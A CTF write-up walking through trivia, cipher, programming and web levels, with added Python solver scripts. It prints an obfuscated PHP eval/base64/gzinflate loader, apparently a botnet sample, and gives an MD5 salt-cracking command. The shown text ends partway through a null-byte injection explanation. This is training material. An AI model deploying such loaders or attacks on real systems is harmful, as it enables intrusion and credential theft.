My Acknowledgement To:
Anant Shrivastava (infinity), Prashant KV (kvbhai), Dhanesh K (danny), Riyaz Walikar (karniv0re),
Murtuja Bharmal (void), Aseem Jakhar (@), Rahul Sasi (FB1H2S), Pardhasaradhi CH (pardhu),
Chaithu Rk (Antagonist), Amol Naik (AMol NAik), Prince Boonlia (boonlia), Atul Alex Cherian (Aodrulez),
Pushkar Pashupat (push), Abhisek Datta (adatta), Ajit Hatti (adh), Bipin Upadhyay (om),
Hemanshu Asolia (h3m4n), Shannon Morse (snubs) & Team from Hak5 - Trust Your Technolust
A few cheeky lines that will gear up the CTF thrill:
   - How many levels were there? 35, Sardaar.
   - A computer, plenty of time, lots of patience and a challenging CTF, what else does a
     hacker need to be happy?
   - Don't cry at the beginning of the CTF. Cry at the end of the CTF.
   - Unfortunately, no one can be told what the CTF is. You have to see it for yourself.
   - I know why you're playing CTF, Neo. I know what you've been doing... why you hardly
     sleep, why you live alone and why night after night, you sit by your computer. You're
     looking for the flag. I know because I was once looking for the same thing. I was looking
     for an answer. It's the question that drives us, Neo. It's the question that brought you here.
     You know the question, just as I did.


Before everything else, a word, in fact a request: kindly avoid going
through this writeup before you have attempted the levels with your wildest
idea, your weird assumptions, your hottest tools, craziest Einstein formula,
or a logic that never fails.

Brief Overview of the CTF Layout:

The CTF was divided into 7 sections, each with 5 levels of challenges.
  1. Trivia Levels: Brain-teasers/Riddles
  2. Crypto Levels: Mystified ciphers/Substitutions
  3. Programming Levels: Mathematical logic/Hash cracking
  4. Web Levels: Redirection/Injection
  5. Reverse Engineering Levels: PE/Apk/Memory dump
  6. Log Analysis: Analyzing pcap/scanner-generated logs
  7. Forensics Level: Incident analysis
Trivia Levels

Trivia Level 1

Official Hint: N/A

Page Source: Nothing Interesting

Description: This operating system also refers to a 1982 science fiction film, a board game, and
a song off the Prodigy B-Side "What Evil Lurks"

Analysis: A quick Google search with the keyword “scifi movie list 1982” revealed android as
the first result.

Flag: android


Trivia Level 2

Official Hint: N/A

Page Source: Nothing Interesting

Description: This fictional IPv4 packet header field was proposed in RFC 3514 as a means for
identifying packets with malicious intent.

Analysis: Google search with the keyword “fictional IPv4 packet header field” revealed the flag.

Flag: evil bit


Trivia Level 3

Official Hint: N/A

Page Source: Nothing Interesting

Description: This humorous RFC of the Internet Engineering Task Force describes a
communication and control protocol suite designed for allowing infinite numbers of monkeys
with infinite numbers of typewriters to produce the entire works of William Shakespeare.

Analysis: Google search with the keyword “communication and control protocol suite designed
for allowing infinite numbers of monkeys” revealed the flag.

Flag: RFC 2795


Trivia Level 4

Official Hint: N/A

Page Source: Nothing Interesting

Description: Metasploit was originally coded for what purpose?

Analysis: I remember going through the book “Metasploit Toolkit”, where it was mentioned
that Metasploit originally started as a network security game.

Flag: game


Trivia Level 5

Official Hint: N/A

Page Source: Nothing Interesting

Description: Released on April 1st 2003, this esoteric programming language uses spaces, tabs
and linefeeds to compose commands.

Analysis: Google search with the keyword “April 1st 2003 programming language” revealed the
flag as whitespace.

Flag: whitespace


Crypto Levels

Crypto Level 1: Ulta Pulta

Official Hint: poiuyt

Page Source: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->

Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy.
ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik
xwy qailki Oexjwok, 2 Ceaa Glyik

Analysis: The page source pointed to an image of a mirrored keyboard. Mapping each
character of the given string to its mirror-image key (the right side of the keyboard swapped
with the left, and vice versa) revealed the flag.
Keyboard Mapping:
3 == 0
- == 2
. == ,
q == p
a == l
z == m

Flag: Windows 2000 already contains features such as the human discipline component,
where the PC can send an electric shock through the keyboard if the human does
something that does not please Windows. - Bill Gates
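The mirror-keyboard substitution as a script, an added example that is not part of the original write-up: it builds the swap table from the keyboard rows so that the pairs listed above (3/0, -/2, ./,, q/p, a/l, z/m) fall out of the row geometry, and applies it to the level's description. The row strings are my reconstruction from those observed pairs.

```python
# Mirror-keyboard ("Ulta Pulta") substitution: each key is swapped with the key at the same
# distance from the other end of its row. The rows below are reconstructed so that the pairs
# observed in the write-up (3<->0, -<->2, .<->,, q<->p, a<->l, z<->m) come out of the geometry.
ROWS = ["1234567890-=", "qwertyuiop", "asdfghjkl", "zxcvbnm", ",."]


def build_mirror_map():
    """Return a dict mapping every character in ROWS to its mirror partner (case preserved)."""
    table = {}
    for row in ROWS:
        for i, ch in enumerate(row):
            partner = row[len(row) - 1 - i]
            table[ch] = partner
            if ch.isalpha():                      # upper-case letters mirror to upper-case
                table[ch.upper()] = partner.upper()
    return table


MIRROR = build_mirror_map()


def ulta_pulta(text):
    """Apply the substitution; characters outside the map (space, ':' ...) pass through.
    The map is an involution, so the same call encodes and decodes."""
    return "".join(MIRROR.get(ch, ch) for ch in text)


# The level's description as printed on the page (line breaks joined with spaces).
CIPHERTEXT = (
    "Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. "
    "ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik "
    "xwy qailki Oexjwok, 2 Ceaa Glyik"
)

if __name__ == "__main__":
    print(ulta_pulta(CIPHERTEXT))
```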


Crypto Level 2: White Noise

Official Hint: Follow the White Rabbit: P (by spnow)

Page Source: <!-- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 -->

Description: shhhkoinahihai

Analysis:
First Attempt (leet way):
I went through the Wikipedia article on Whitespace (programming language) and got the idea that
the given whitespace consists of tabs and spaces, which must be replaced by 1 and 0.
   1. Copied the whitespace into gedit (text editor).
   2. Replaced the tabs with 1 and the spaces with 0.
   3. Got the following sequence of 0’s and 1’s.
   4. Now this binary sequence needed to be converted into something meaningful, so I
      googled for “binary to text translator” and got an online tool at
      http://home.paulschou.net/tools/xlate/
   5. Translated the binary sequence, but to my surprise I couldn’t get any meaningful
      information. Where did I have it wrong?
Second Attempt (leet way):
   6. After some thought I came to conclude: how about replacing tabs with 0 and spaces with 1?
   7. There, I got a new sequence, with expectations.
   8. Again I used the same binary to text translator, and voila!!! There was our flag.
Alternate Method:
The above method requires quite a lot of manual work.
Thus, we can solve the above problem in this alternate way:
   1. Copy the whitespace into gedit (text editor) and save it.
   2. In Linux there is a utility called “tr” to translate characters.
   3. Type at the terminal: cat whitespace.txt | tr "\t " "01"
      (Note: there is a space after \t; tr maps the tab to 0 and the space to 1.)
   4. There is our binary sequence; again we can copy it into the binary to text translator to
      get the flag.

Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot
Repeat Any of Your Previous 30689 Passwords - MS KB 276304
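An added example (not from the write-up) that does the tab/space translation in Python and tries both polarities, since the first attempt above failed only because tabs and spaces were mapped the wrong way round. The level's whitespace blob is not reproduced on the page, so the sample input is constructed by encoding a short string.

```python
def whitespace_to_bits(ws, tab_bit="0", space_bit="1"):
    """Translate a tab/space stream into a bit string; any other character is dropped."""
    table = {"\t": tab_bit, " ": space_bit}
    return "".join(table[ch] for ch in ws if ch in table)


def bits_to_text(bits):
    """Pack a bit string into 8-bit characters, ignoring an incomplete trailing byte."""
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def decode_whitespace(ws):
    """Try both polarities, as the write-up did by hand, and return (polarity, text) for the
    one that yields printable ASCII. Inverting 7-bit ASCII always gives bytes >= 0x80, so the
    wrong polarity never looks printable."""
    for name, tab_bit, space_bit in (("tab=1,space=0", "1", "0"), ("tab=0,space=1", "0", "1")):
        text = bits_to_text(whitespace_to_bits(ws, tab_bit, space_bit))
        if text and all(32 <= ord(c) < 127 for c in text):
            return name, text
    return None, ""


def text_to_whitespace(text):
    """Constructed helper: encode text as tabs (0) and spaces (1), MSB first, to make sample input."""
    return "".join("\t" if bit == "0" else " "
                   for ch in text for bit in format(ord(ch), "08b"))


# Constructed sample standing in for the level's whitespace blob.
SAMPLE = text_to_whitespace("MS KB 276304")

if __name__ == "__main__":
    print(decode_whitespace(SAMPLE))
```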


Crypto Level 3: The Base Test

Official Hint: http://lmgtfy.com/?q=RFC+for+base+encoding

Page Source: ====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====

Description: N/A

Analysis: I went through RFC 4648 twice but didn’t find anything that would directly lead me to
the flag. However, I got a basic idea of the patterns of the various base encodings.
My assumptions about the given string were:
    - Rot-13
    - Reverse
    - Base64
    - Base32
I went through combinations of several of the above assumptions and finally got the flag
with the following steps:
   1. Remove the = from both ends of the given string.
   2. Reverse the string:
       “JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRKU4RJ5HU6T2PJ5”
   3. Apply base32 decoding:
       “MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======”
   4. Apply base32 decoding again to the result of step 3 to get the flag.

   To reverse the text: http://textmechanic.com/Reverse-Text-Generator.html
   To decode base32: http://online-calculators.appspot.com/base32/

Flag: duoTriGeSimalandNgiti
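The same steps as an added Python example (not part of the original write-up): strip the padding, reverse, and then keep base32-decoding while the output is still printable ASCII, which peels both layers without having to guess how many there are.

```python
import base64
import binascii

# The level's page-source string, as given.
PAGE_SOURCE = "====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ===="


def unwrap_and_reverse(s):
    """Steps 1 and 2 of the write-up: drop the '=' from both ends and reverse the string."""
    return s.strip("=")[::-1]


def peel_base32(s):
    """Repeatedly base32-decode while the result is valid, printable ASCII.
    Returns every layer in order; the last entry is the innermost plaintext.
    Stops on a non-alphabet character, bad padding, or non-text output."""
    layers = []
    while True:
        try:
            decoded = base64.b32decode(s).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not decoded.isprintable():
            break
        layers.append(decoded)
        s = decoded
    return layers


def solve(page_source=PAGE_SOURCE):
    layers = peel_base32(unwrap_and_reverse(page_source))
    return layers[-1] if layers else None


if __name__ == "__main__":
    for i, layer in enumerate(peel_base32(unwrap_and_reverse(PAGE_SOURCE)), 1):
        print("layer", i, layer)
```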


Crypto Level 4: Elucidate

Official Hint: N/A

Page Source: <!-- md5sum: ad4e2705406ef1197f03f93474e30020 -->

Description: Elucidate

Analysis: Nothing seems better than sleeping rather than going on decoding that obfuscated
PHP script. The first, laziest thing I decided to do was to look for an online tool that would do
the job without requiring several decoding steps.
Eventually I came across an online tool:
http://www.whitefirdesign.com/resources/unobfuscate-php-hack-code.html

Now back to the analysis. Let us understand the script part by part:

<?php
$vaa8089358f2="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";
@eval($vaa8089358f2("**base 64 encoded string**"));
?>

   - On the first line, a variable is set to a string represented by a mix of
     hexadecimal (‘\x’) and octal (‘\’) escape sequences. Python uses the same escapes as PHP for
     hex and octal, so it’s easy to use the Python shell to see a “normalized” ASCII representation of
     these strings:
Python Shell Below:

>>> "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"
'base64_decode'
   - The next idea was to decode the base64 encoded string.
   - I used the online tool mentioned above and got an unformatted PHP script.
   - A quick Google search revealed a PHP formatter at
     “http://www.prettyprinter.de”
   - So by this time I had decoded the base64 encoded string with proper formatting.
   - On further analysis I found another obfuscated script:

   @eval($w67426c2c6071d5516d2011022955d36($d9917ccba06ba0e3ed151e1b9461ae76($xaa4294a0bca922b2cc
   8b9a2789e95fa("yIIgnkcORC4eT5SRD0cho3s2WqMVXWozH4hRSSXY7B0YBDtdngd0cs+9f96rZnyjS/jj7hmZZ
   8+87M2sTxT1NWZoRJljzDMMXNUXppQ/rLQG89Uy+9UlsxyVrWmoGozLR7ilMhAai8gyemgw0aVKsNMFMeo
   j3UOjhsR6TP2Z4WVZvIzgmX9r/6j7l6mw1agjlawTPb9kZk08qlP08gXt8pxW2txJNVWt1uyqrZoOHyAjLA4Xd6la
   nOsZj9e3lE9Fuy4bU/mZC5KemoeKUXECwb/WHKBDPY7lz8sIiNb2VU9Wq+MfSvwmzzxnphJxlvz3XtCOsSRL
   mc/mUHEd5KcJUMfe1L8OjjXYn+/oSAnfxD7jKTxVNLWEmuLDzZL7omK1VavnU6kDb1C0nx7123qZguxg1v3+
   xVMqCZ43iJoxENOxGzaOAA5zDFxXwzMZOthn+4XYQZCC/H9lIl6iIin+/BSG0Mf9310hya7rLywnQBBV3S1/h
   Mc8+UE9B764+Uj7aalqKA+ZlpHY/LsW+Bcz3PqUjlUMeO79bsS67a7wzYKhscgvTBp+4bF0TV2mSxTeEJzBnu8
   J623YhwZrQTZf94R5de1JCTAXpfLY5KVyIrk0M/bxjcFPDTzaISXHrMXb5/a0FGXHtOY1VgecMP/kmSRdCAAx
   k/ojrAVaJrfy+bSRPFu5MIsw1UT2RiRRIYmvsGkUC+Fj8ks5Uu76Nni47+ARaclzp4jQFIY0MkIrUFslxscIUvmcV
   qaeINrbpVI/unqFCWUlwirlfd9krZYM+r3k2gLeF/nv4uUmSP7Sf8/8EA0KyhkGsI7HZ/fsQ2QiGQhQ3p687p2CZ
   +yklj4fKEmJcfq2JQ3vaqGGBwsxkhu0F81tXcT67WlED2M5BmZ2eDq2dkLqMC6z720S66eSxPLAAunJ1jgEAKN
   737geMYA9xjMxqCxC"))));

   - And there was another base64 encoded string inside it.
   - Now the online tool comes into play. The above script is of the form:
     @eval(gzinflate(base64_decode(str_rot13("base64_encoded"))));

   - The output revealed some kind of botnet behaviour; however, at this point I was least
     bothered about this fact and kept on observing it.

   - A quick overview of the output drew my attention to the following variable:

   - $_4fa3332ef3d19e9840387434b8d28780 =
     "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143
     \x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165
     \x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144
     \x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141
     \x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144
     \x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145
     \x70\150\x65\156\x6f\155\x65\156\x61";
     (one string, wrapped here for display)

   - Hoping this would be the final step, I used the Python shell. In case anyone doesn’t
     have Python installed, the Google App Engine Python shell at http://shell.appspot.com/
     would be helpful, or there may be other ways to decode it:

>>> "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61"
'onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena'

Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena


Crypto Level 5: Yeah! As you guessed, it’s Steganography

Official Hint: Yeah! As you guessed, it’s Steganography

Page Source: <!--
Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU
Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme
and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor
Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd
-->

Description: Llun Saving Bank is fed up with known encryption standards to store the data.
They decided to reinvent the wheel. Can you decode the data?

Analysis: A close look at the initials of the title “Llun Saving Bank” suggests LSB. I didn’t know
much about the LSB encoding technique in text; however, I had come across one with images in
some war-game. I had a look at LSB on Wikipedia and got the idea to collect the rightmost bit
of each character. I converted the given text into binary and, whoa, I was left with a long list of
binary. Picking the rightmost bit out of each byte by hand was a real challenge, so a simple Python
script made the task easier:

#!/usr/bin/env python3
# The binary dump is pasted with a space between each byte ("01001000 01110011 ...").
# Strip all whitespace first so that index 7, 15, 23, ... is always the rightmost
# (least significant) bit of each byte.
ciphertext = ''.join('<paste binary here>'.split())
result = ''
for i in range(7, len(ciphertext), 8):
    result += ciphertext[i]
print(result)

Note: My Python script assumes the binary has a space between each 8-bit word, something like
“01001000 01110011 00100000…” and so on.

On executing the Python script I got the LSB of each character, which I converted
to ASCII using http://home.paulschou.net/tools/xlate/, and there was our flag in plain text.

Flag: Learn howto Hide in Plain Sight
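An added Python example (not from the write-up) that extracts the LSBs directly from the cover text. The cover below is the comment from the level's page source as printed above, with the extraction line breaks restored as spaces (an assumption); lsb_from_binary_dump() is the equivalent of the script above for a pasted binary dump.

```python
# The level's page-source comment, lines joined with single spaces (assumed to be the original separator).
COVER = (
    "Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU "
    "Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme "
    "and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor "
    "Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd"
)


def lsb_extract(cover):
    """Take the least-significant bit of every character code and pack 8 bits per byte,
    MSB first; an incomplete trailing group is ignored."""
    bits = [ord(ch) & 1 for ch in cover]
    out = []
    for i in range(0, len(bits) - len(bits) % 8, 8):
        value = 0
        for bit in bits[i:i + 8]:
            value = (value << 1) | bit
        out.append(chr(value))
    return "".join(out)


def to_binary_dump(text):
    """The space-separated '01001000 01110011 ...' form the write-up converted the text into."""
    return " ".join(format(ord(ch), "08b") for ch in text)


def lsb_from_binary_dump(binary_text):
    """Equivalent of the script above: strip whitespace, then take bit 7 of every 8-bit group."""
    bits = "".join(binary_text.split())
    return "".join(bits[i] for i in range(7, len(bits), 8))


if __name__ == "__main__":
    print(lsb_extract(COVER))
```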


Programming Levels


Programming Level 1: ROTOMATA

Official Hint: N/A

Page Source: <!-- We only know the first 6 characters: "Men at" -->

Description: Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm
nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit

Analysis: I really didn’t spend much time decoding the whole string. Rather, I analyzed the
difference between the first three words and then googled for them.

M - M = 0
e - f = 1
n - p = 2
space = 3
a - e = 4
t - y = 5
space = 6
s - z = 7
o - w = 8
m - v = 9
e - o = 10

Hence the first three words I obtained were “Men at some”. After I googled them, I got the
famous quote by William Shakespeare, which was the flag.

Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our
stars, but in ourselves, that we are underlings
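An added Python example, not part of the write-up, that does the crib comparison above programmatically: it recovers the per-position shift from the known prefix "Men at" and decodes under the shift-equals-position rule, which is only verified here for the opening words the write-up decoded.

```python
import string

ALPHA = string.ascii_lowercase

# The level's description and the crib from its page source.
CIPHERTEXT = ("Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm "
              "nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit")
CRIB = "Men at"


def shift_between(cipher_ch, plain_ch):
    """Caesar shift (0-25) that turns plain_ch into cipher_ch, or None for non-letters."""
    if not (cipher_ch.isalpha() and plain_ch.isalpha()):
        return None
    return (ALPHA.index(cipher_ch.lower()) - ALPHA.index(plain_ch.lower())) % 26


def recover_shifts(ciphertext, crib):
    """Per-position shifts over the crib, the table the write-up built by hand."""
    return [shift_between(c, p) for c, p in zip(ciphertext, crib)]


def progressive_decode(ciphertext, shift_at):
    """Decode with a position-dependent shift; non-letters are left in place but still count
    as positions, which is what makes 'space = 3' and 'space = 6' in the table above."""
    out = []
    for i, ch in enumerate(ciphertext):
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift_at(i)) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    print(recover_shifts(CIPHERTEXT, CRIB))
    print(progressive_decode(CIPHERTEXT, lambda i: i)[:11])
```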


Programming Level 2: Pascal’s Triangle

Official Hint: N/A

Page Source: <!-- ex: The sum of all middle terms till first 6 rows is 9 -->

Description: The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle

Analysis: This seemed easy at first sight. My first expectation was to find some ready-made
code, but that really didn’t work out; all I got was algorithms and some frustrated guy
like me crying on the discussion forums to get their erroneous triangle code working. Googled
Pascal’s triangle, went through Wikipedia on Pascal’s triangle, WolframAlpha on Pascal’s triangle;
frustration takes you to any height of paranormal activity. After spidering and crawling through
the links, I came across some useful resources:

http://rosettacode.org/wiki/Pascal's_triangle
http://www.mathsisfun.com/pascals-triangle.html
http://www.mathwords.com/b/binomial_coefficients_pascal.htm
http://www.youtube.com/watch?v=OMr9ZF1jgNc

- So, all in all, time to do some serious coding.
- The challenge considers the middle term of the odd rows.
- Wrote code in C and hoped it would work out; failed.
- Looked for some Java code, which compiled successfully, but when I executed it I was staring at my
  LCD; the program kept running for more than 30 seconds on my i5, that was a stack overflow.
- Time for some manual work again; looked it over and realized that binomial coefficients
  were the key to getting the flag.
- Worked it out again, for the 3rd time now in Python, with unexpected hope; executed it, got
  something, and voila!!! that was the flag.

This was the Python script:

#!/usr/bin/python
from math import factorial
# Rows are numbered from 0; the rows with an odd number of terms (n = 0, 2, 4, ...)
# each have a single middle term C(n, n/2). Integer division (//) keeps the sum exact.
s = 0
for n in range(0, 1337, 2):
    p = n // 2
    s += factorial(n) // (factorial(p) * factorial(n - p))
print(s)

Flag: 4365932474188423707093600683230364311423941198777278660206654343120587216
667436233239359631257671906424254797004032326756653034333310397082007259357870
623427662432460587818667097226705645987145656659456934356498862160032628647508
069786551862253737753435645565104842509752373488183866315706330467111008238321
829445373767874422156015835789685633070319435688289548287438365157627110284786
6170999680296497
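An added Python example (not the write-up's script) that reproduces the sum with the page's own check, the 6-row hint equal to 9, and avoids the factorials by stepping from one middle term to the next with C(n+2, n/2+1) = C(n, n/2)·(n+1)(n+2)/(n/2+1)^2; the factorial version is kept alongside for comparison.

```python
import math


def middle_terms(rows):
    """Yield the middle term C(n, n//2) of every odd-length row n = 0, 2, 4, ... below `rows`.
    Each term is derived from the previous one by the exact ratio
    C(n+2, k+1) = C(n, k) * (n+1)(n+2) / (k+1)^2 with k = n/2, so no factorials are needed."""
    term, n = 1, 0                      # row 0 has the single term 1
    while n < rows:
        yield term
        k = n // 2
        term = term * (n + 1) * (n + 2) // ((k + 1) * (k + 1))
        n += 2


def middle_term_sum(rows):
    """Sum of the middle terms over the first `rows` rows (rows numbered from 0)."""
    return sum(middle_terms(rows))


def middle_term_sum_factorial(rows):
    """The write-up's approach, with integer division so it stays exact in Python 3."""
    total = 0
    for n in range(0, rows, 2):
        p = n // 2
        total += math.factorial(n) // (math.factorial(p) * math.factorial(n - p))
    return total


if __name__ == "__main__":
    print(middle_term_sum(6))           # the page-source hint: 9
    print(middle_term_sum(1337))        # the flag
```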


Programming Level 3: Your Brainfuck Sir...

Official Hint: N/A

Page Source: <!-- md5sum: 4f1ec9481c0f0ae0a199ea5c8dedf62d -->

Description: Debug bfcode to get the flag

Analysis: I had encountered brainfuck earlier, but never this way. A Google search for a brainfuck
interpreter resulted in http://www.iamcal.com/misc/bf_debug/. I executed the given code without
any input in the interpreter and observed the result. Something appeared partially, which didn’t
seem to carry any useful meaning. Tried with some random input and got the same output again
and again. Maybe a defect in the interpreter, LOL. It was MANUAL time now.
Glanced across the lines on Wikipedia about brainfuck programming. There I got to see the
small “Hello World” program. I executed it in the interpreter and got the output successfully.
Observed that in the “Hello World” brainfuck program each line ends with a period. The period has a
special meaning in brainfuck: it is the same as a print statement, which the given
brainfuck code was missing. GOT IT!!! So appending a period at the end of each line was all
it took to get the flag.

Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs
after you..
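An added Python example (not from the write-up): a small brainfuck interpreter plus the fix described above, appending a period to each line. The level's own bfcode is not on the page, so SILENT_PROGRAM is a constructed three-line program that computes letters but never prints them.

```python
def run_brainfuck(code, stdin=b""):
    """Minimal brainfuck interpreter: 8-bit wrapping cells, ',' yields 0 at EOF.
    Returns the bytes written by '.'; any other character in `code` is a comment."""
    jump, stack = {}, []                 # matching-bracket table for O(1) loop jumps
    for pos, ch in enumerate(code):
        if ch == "[":
            stack.append(pos)
        elif ch == "]":
            if not stack:
                raise ValueError("unbalanced ']' at %d" % pos)
            start = stack.pop()
            jump[start], jump[pos] = pos, start
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, ip, inp = [0] * 30000, 0, 0, 0
    out = bytearray()
    while ip < len(code):
        ch = code[ip]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = stdin[inp] if inp < len(stdin) else 0
            inp += 1
        elif ch == "[" and tape[ptr] == 0:
            ip = jump[ip]                # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            ip = jump[ip]                # back to the loop start
        ip += 1
    return bytes(out)


def add_trailing_periods(code):
    """The write-up's fix: make every line print the current cell before moving on."""
    return "\n".join(line + "." for line in code.splitlines())


# Constructed sample in the spirit of the level: line 1 builds 65 ('A') in cell 1 via an
# 8 x 8 loop plus one, lines 2 and 3 increment it to 'B' and 'C'; nothing is ever printed.
SILENT_PROGRAM = "++++++++[>++++++++<-]>+\n+\n+"

if __name__ == "__main__":
    print(run_brainfuck(SILENT_PROGRAM))                       # b''
    print(run_brainfuck(add_trailing_periods(SILENT_PROGRAM)))  # b'ABC'
```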


Programming Level 4: Substitute Problem

Official Hint: N/A

Page Source: <!-- md5sum: 31178aa23ef43566009d97f38a470279 -->

Description: deobfus

Analysis: There wasn’t much to do with this; everything was self-explanatory in the page itself.
The only thing this challenge required was plenty of time and lots of concentration. For me,
it took nearly 2 continuous hours to get through all the iterations. Probably some hardcore
programmer would have written a simple piece of code to get it done in a few seconds. So my time
complexity with this problem was exponential compared to the programmer’s.
The final iteration revealed the text as:
SEDULoUSLY ESCHEw oBFUSCAToRY HYPERVERBoSITY AND PRoLIXITY 84 RoEDY GREEN
After trying a variation of case, I got the final flag.

Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green


Programming Level 5

Official Hint: N/A

Page Source: Nothing Interesting

Description: A pinch of salt for your coffee, Sir?

Analysis: I’m really bad at brute forcing and guessing unnatural passwords. Hoping to get it
right this time, I went to the salt.asp page and generated hashes for a few random keywords. Sorry,
I wouldn’t share those crazy ones; they nearly killed my system with overheating :D
The basic idea was to crack the hash and identify the salt, which was the flag to complete this
challenge. I looked around for an MD5 cracker and got one at http://3.14.by/en/md5. Next I tried
to crack the hashes for the random keywords. After a while my system temperature went above the
critical level and I had to shut down the process; it was a really disgusting job to watch the
LCD and wait for the cracker to do its job. The cracker doesn’t seem to understand that my
system is not a blade server, or maybe I don’t. On a final note, I decided to take the hash of a
single word or digit and crack it. Again the same boring task; in the first set I generated the hashes
for 0-10, and finally, on the second attempt, with the hash for “1” I got my flag.
Working Steps:
   1. On the page salt.asp, input the password 1.
   2. The hash thus generated for my system was “243dc4f11700aa3bd6c7de312bb0ca31”
      (Note: each system will generate a unique hash).
   3. Fire up the Windows console and type the following at the command prompt:
      barswf_cuda_x32.exe -h 243dc4f11700aa3bd6c7de312bb0ca31 -c 0a
   4. After approx. 2 minutes on my i5, the cracker successfully displayed the result.
   5. There we had our key: “1c183e7”
   6. That means "1" + salt "c183e7", since hash = Algo(password + salt).
   7. In the given problem, 243dc4f11700aa3bd6c7de312bb0ca31 = md5("1" + "c183e7").
   8. And finally my flag was c183e7 (Note: each system will have a unique flag).

Flag: c183e7


Web Levels

Web Level 1

Official Hint: N/A

Page Source: Nothing Interesting

Description: Can you view the bytes in password.asp from Me?

Analysis: As the description suggests, it was null byte injection. I had come across a null byte
problem on one of the wargames. Let’s understand the problem. Our challenge was to read the
information from the file password.asp, which somehow was protected by the server. Here we
can observe in the given URL that the default parameter is test.txt. Multiple questions arise here,
such as: why only test.txt as the parameter? If you don't do anything with a parameter, why take
one?

Assume a real application, from my perspective; the idea with this level is that we
have an application which takes a filename from us, reads it, and shows it to us. We found an
example of input, "test.txt". We know there is sensitive information in password.asp, but we can't
get password.asp. So let's imagine that whoever wrote this application, which reads any file we
tell it to, wanted to keep us from reading anything but files which end in ".txt". So any input
we give it that doesn't end in ".txt" is rejected. So here's the problem: how do we get a file
which ends in ".asp" when the filename we provide has to end in ".txt"?

The answer obviously is the null byte, but that would be a partial answer in the context of the
question “HOW?”. In languages like ASP and PHP, the null byte doesn't end a string; it’s just
another character. In C-based languages (C, C++, C#) a null byte means the end of a string. So if
we give a PHP script a filename to open that has a null byte in it, it's different to PHP and to the OS.
